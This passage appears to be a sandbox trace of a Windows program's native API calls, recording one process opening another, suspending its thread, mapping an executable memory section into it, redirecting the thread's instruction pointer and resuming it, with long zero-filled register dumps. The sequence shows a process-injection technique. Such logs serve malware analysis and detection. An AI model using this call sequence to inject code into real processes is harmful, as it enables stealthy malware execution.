[158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0139.112] NtResumeThread (in: ThreadHandle=0x1a4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0139.112] NtClose (Handle=0x1a0) returned 0x0 [0139.112] NtClose (Handle=0x1a4) returned 0x0 [0139.114] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x1184, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a4) returned 0x0 [0139.115] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0139.115] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0139.115] NtReadVirtualMemory (in: ProcessHandle=0x1a4, BaseAddress=0x3ad000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0139.115] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0139.117] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1188) | out: ThreadHandle=0xdea64*=0x1a0) returned 0x0 [0139.118] NtSuspendThread (in: ThreadHandle=0x1a0, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0139.118] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x27b0000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0139.129] NtGetContextThread (in: ThreadHandle=0x1a0, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x3ad000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0139.142] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0139.143] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0xf8200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0xf9000) returned 0x0 [0139.150] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0xf8200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x4e0000, SectionOffset=0x0, ViewSize=0xde6e8*=0xf9000) returned 0x0 [0139.360] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0139.365] NtClose (Handle=0x1a8) returned 0x0 [0139.365] NtSetContextThread (ThreadHandle=0x1a0, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x3ad000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x545717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0139.376] NtResumeThread (in: ThreadHandle=0x1a0, 